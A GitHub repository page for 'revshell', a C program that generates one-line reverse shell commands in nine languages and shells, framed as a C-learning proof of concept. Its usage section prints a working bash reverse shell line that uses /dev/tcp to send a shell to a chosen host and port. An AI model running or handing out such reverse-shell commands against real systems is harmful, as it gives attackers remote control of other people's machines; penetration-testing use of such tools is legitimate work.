Skip to content

Reverse shell generator produced as proof of concept of C language study and learning.

Notifications You must be signed in to change notification settings

Nosferatuvjr/Reverse-Shell-Generator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

revshell

Reverse shell generator with simple one-line commands.

Usage

▶ ./revshell

    Produced by Nosferatuvjr, feel free to use it, but please credit me.
                            v0.1

Usage: revshell.c <host> <port> <number of payload>

Payload list:
1. bash
2. nc
3. rm /tmp/f
4. python
5. php
6. perl
7. ruby
8. powershell
9. zsh

▶ ./revshell 192.168.0.1 1234 1

- bash -i >& /dev/tcp/192.168.0.1/1234 0>&1

Showcase

Execution

Compile

Compile it yourself or use pre-compiled binary from releases section.

gcc revshell.c -o revshell

Fale comigo em :

About

Reverse shell generator produced as proof of concept of C language study and learning.

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages